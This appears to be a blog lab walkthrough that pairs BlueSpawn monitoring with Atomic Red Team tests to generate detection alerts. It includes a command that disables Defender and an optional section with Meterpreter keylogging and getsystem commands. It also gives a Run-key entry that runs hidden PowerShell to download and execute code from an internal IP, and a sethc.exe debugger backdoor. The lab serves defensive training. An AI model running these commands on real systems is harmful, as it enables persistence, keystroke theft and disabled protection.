Atomic Red Team Testing with Bluespawn

By on

 Bluespawn


In this lab we will be using Bluespawn as an alternative for an EDR system. Normally full EDRs like Cylance, Symantec and Crowdstrike are very expensive and tend not to show up in classes like this.


BlueSpawn will monitor the system for "weird" behavior and note it when it occurs.


In this lab, we will be starting BlueSpawn and then running Atomic Red Team to trigger a lot of alerts.


First, let’s disable Defender. Simply run the following from an Administrator PowerShell prompt:


Set-MpPreference -DisableRealtimeMonitoring $true


This will disable Defender for this session.


If you get angry red errors, that is Ok, it means Defender is not running.


Let's get started by opening a Terminal as Administrator: 




Now, let's open a command Prompt:



Next, let’s change directories to tools and start Bluespawn: C:\Users\adhd>cd \tools

C:\tools>BLUESPAWN-client-x64.exe --monitor --level Cursory




Now, let’s use Atomic Red Team to test the monitoring with BlueSpawn:


First, we need to open a PowerShell Prompt:




Next, in the PowerShell Window we need to navigate to the Atomic Red Team directory and import the powershell modules:


PS C:\Users\adhd> cd C:\AtomicRedTeam\invoke-atomicredteam\


Then, install the proper yaml modules


PS C:\Users\adhd> Install-Module -Name powershell-yaml


PS C:\AtomicRedTeam\invoke-atomicredteam> Import-Module .\Invoke-AtomicRedTeam.psm1


Now, we need to invoke all the Atomic Tests.


Special note... Don't do this in production... Ever. Always run tools like Atomic Red Team on test systems. It is recommend that you run it on a system with your EDR/Endpoint protection in non-blocking/alerting mode. This is so you can see what the protection would have done, but it will allow the tests to finish.


PS C:\AtomicRedTeam\invoke-atomicredteam> Invoke-AtomicTest All


If you get any “file exists” questions or errors, just select Yes.


It should look like this:




Please note, there will be some errors when this runs. This is normal.


Only let this run for about 120 seconds!!! Kill it with Ctrl + c!!


You should be getting a lot of alerts with Bluespawn Switch tabs in your Terminal to see them:




Now, let’s go back to the PowerShell prompt and clean up:


PS C:\AtomicRedTeam\invoke-atomicredteam> Invoke-AtomicTest All -Cleanup


It should look like this:



If you have more time


Feel free to exploit system using the commands we went through in AppLocker or Sysmon and then run the following Meterpreter commands


Run commands


meterpreter > keyscan_start


meterpreter > keyscan_dump




meterpreter > shell


C:> reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Payload /d "powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://172.20.243.5:80/a'))\"" /f


C:> reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "c:\windows\system32\cmd.exe"



meterpreter >getsystem









Comments

Post a Comment

Popular posts from this blog

GOAD Active Directory LAB Setup on a Windows host

By on
Image
 In this write-up, I am going to explain how I set up the GOAD Active directory lab from my Windows host using VMware, along with a number of errors and steps and procedure I went through how I fixed them. GOAD (Game of Active Directory) lab is created by Orange Cyberdefense to provide pentesters a ready-to-use, vulnerable AD environment in which to practise common attack methods. As described in the Github page, “the lab is intended to be installed from a Linux host”, but it is still possible to successfully install the lab from a Windows host. I did not want to install the lab inside a virtual Ubuntu machine, as nested virtualisation would slow down performance too much. On high level, my setup will look like: Windows host: with Vagrant installed to run the VMs on VMware. VMware Pro: with Ubuntu 22.04 VM installed to run ansible playbooks to make the AD vulnerable. In this environment, there are two different available labs: GOAD : 5 vms, 2 forests, 3 domains (full goad lab) GOAD...
Read more

How to install Impacket/Ntlmrelayx.py

By on
Image
Ntlmrelayx.py is as python script that will simply relay NTLMv1/v2 hashes. Installing it is just straight forward on Kali Linux. Step 1:  Install the dependencies Ldapdomaindump is needed first, which can be installed by typing ┌──(root㉿kali)-[/home/kali/ActiveDirectory] └─# pip install ldap3 dnspython ┌──(root㉿kali)-[/home/kali/ActiveDirectory] └─# pip install ldapdomaindump Step 2: Once the dependencies are installed, download the impacket suite ┌──(root㉿kali)-[/home/kali/ActiveDirectory] └─# git clone https://github.com/CoreSecurity/impacket.git Once downloaded, go to the directory and install it ┌──(root㉿kali)-[/home/kali/ActiveDirectory/impacket] └─# python setup.py install And once installed, You can now run Impacket, run ntlmrelayx.py from any directory now. ┌──(root㉿kali)-[/home/kali/ActiveDirectory/impacket] └─# ntlmrelayx.py -tf target.txt -smb2support
Read more

My Short Analysis - Redline Infostealer

By on
Image
  In this write up, Let's tear up a specific sample of Infostealer malware and deep dive into some of its functions. This is just short analysis of Redline Infostealer malware and it is intended for educational and entertainment purposes only. The reason for picking up this sample is because of its significant and rampant in the cybercrime ecosystem. One of the most common and prolific malware stealers out there in the wild. Distributed in the cybercrime marketplace and the dark web. So, without further ado let's take a look on this malware and unravel some of its functions. Executive Summary: RedLine Stealer is a malicious program that harvest users’ confidential data from browsers, systems, installed software, credit card information and domain information of enterprise environment. It also infects operating systems with other malware. Distributed in underground forums for sale as standalone ($100/$150 depending on the version) or on a subscription basis ($100/month). This ma...
Read more